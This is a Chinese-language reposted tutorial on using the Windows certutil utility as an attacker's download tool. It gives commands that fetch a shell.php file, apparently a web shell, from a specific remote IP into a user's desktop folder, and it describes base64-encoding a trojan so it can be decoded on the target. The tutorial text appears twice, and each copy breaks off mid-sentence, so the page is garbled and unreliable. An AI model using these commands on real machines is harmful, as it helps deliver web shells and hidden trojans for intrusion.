admin管理员组文章数量:1026989
certutil
certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。
远程下载
certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下
certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下
文件base64编码解码
将a.txt文件base64编码为b.txt
certutil -encode a.txt b.txt
将c.txt文件base64解码为c.txt
certutil -decode b.txt c.txt
所以可以将木马base64编码后再解码。这里的木马可以是exe木马或者是w
certutil
certutil也是windows下一款下载文件的工具,自从WindowsServer 2003就自带。但是在Server 2003使用会有问题。也就是说,以下命令是在Win7及其以后的机器使用。
远程下载
certutil -urlcache -split -f http://114.118.80.138/shell.php #下载文件到当前目录下
certutil -urlcache -split -f http://114.118.80.138/shell.php c:/users/xie/desktop/shell.php #下载文件到指定目录下
文件base64编码解码
将a.txt文件base64编码为b.txt
certutil -encode a.txt b.txt
将c.txt文件base64解码为c.txt
certutil -decode b.txt c.txt
所以可以将木马base64编码后再解码。这里的木马可以是exe木马或者是w
版权声明:本文标题:certutil工具的用法 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/jiaocheng/1729748719a966383.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论